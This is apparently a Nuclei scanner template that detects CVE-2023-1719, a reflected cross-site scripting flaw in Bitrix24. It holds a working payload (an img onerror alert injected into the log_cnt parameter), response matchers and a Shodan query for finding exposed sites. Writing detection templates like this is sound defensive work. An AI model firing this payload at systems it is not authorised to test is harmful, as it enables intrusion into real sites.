2023-11-06 16:45:38 +00:00
id : CVE-2023-1719
info :
2023-11-07 14:39:24 +00:00
name : Bitrix Component - Cross-Site Scripting
2023-11-06 16:45:38 +00:00
author : DhiyaneshDk
severity : high
description : |
Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim’
reference :
- https://starlabs.sg/advisories/23/23-1719/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1719
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2023-1719
cwe-id : CWE-665
2023-11-09 06:04:52 +00:00
epss-score : 0.00248
epss-percentile : 0.62517
2023-11-06 16:45:38 +00:00
metadata :
2023-11-07 14:39:24 +00:00
verified : true
2023-11-07 14:54:31 +00:00
max-request : 1
2023-11-06 16:45:38 +00:00
vendor : bitrix24
product : bitrix24
2023-11-07 14:54:31 +00:00
shodan-query : html:"/bitrix/"
2023-11-06 16:45:38 +00:00
tags : cve,cve2023,bitrix,xss
http :
- method : GET
path :
- "{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>"
matchers-condition : and
matchers :
- type : word
part : body
words :
- "'LOG_CNT':"
- "<img onerror=alert(document.domain) src=1>"
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2023-11-09 10:11:53 +00:00
# digest: 4a0a00473045022100f54570076df2fbb61bb1838213d54ab8014e7840d27da79a639fac9b401ff7f002203da8ab467dc61a01c72f4f0f115a8d77632e23a6f8ea930bc999b5f77419f30e:922c64590222798bb761d5b6d8e72950
